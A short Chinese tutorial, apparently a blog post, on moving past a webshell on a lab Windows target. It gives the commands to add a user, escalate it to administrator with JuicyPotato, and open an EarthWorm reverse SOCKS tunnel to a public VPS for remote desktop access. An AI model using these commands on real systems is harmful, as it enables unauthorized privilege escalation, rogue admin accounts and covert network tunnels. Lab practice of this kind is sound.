很多小伙伴在拿下一台机器，尤其对于我这种菜鸟来说，连接一句话木马后，就不知道怎样进行下一步操作了，所以，这次这里拿靶机尝试做了一个内网的端口映射

拿到机器时候发现为普通用户权限

拿到机器时候whoami之后为普通用户权限的情况下，上传jucypotato尝试添加用户提权

net user 用户 用户密码 /add

jucypotato.exe -p “net user administrators 被添加的用户”

尝试远程连接后各种操作均失败

利用公网IP进行端口监听

首先我们需要一个vps对端口进行监听，映射端口和监听端口要设置好，且不被占用哦

根据系统版本进行一个工具的匹配上传earthworm

设置好监听后，向目标机器上传相应版本的earthworm工具（本次为win_32.exe）

建立反向代理：

win_32.exe -s rssocks -d 129.211.x.x (监听公网ip) -e 8888(映射端口=目标机器访问的端口)

设置成功后，公网监听的端口可返回状态

使用proxifer代理

使用socks做好配置

访问目标IP

使用之前创建的管理员用户远程登录桌面

接下来可直接使用创建的管理员用户远程登录桌面

之后就可以在内网进行别的操作啦，此次全程使用个人服务器靶机，好奇的伙伴可以尝试搭建靶机复现啦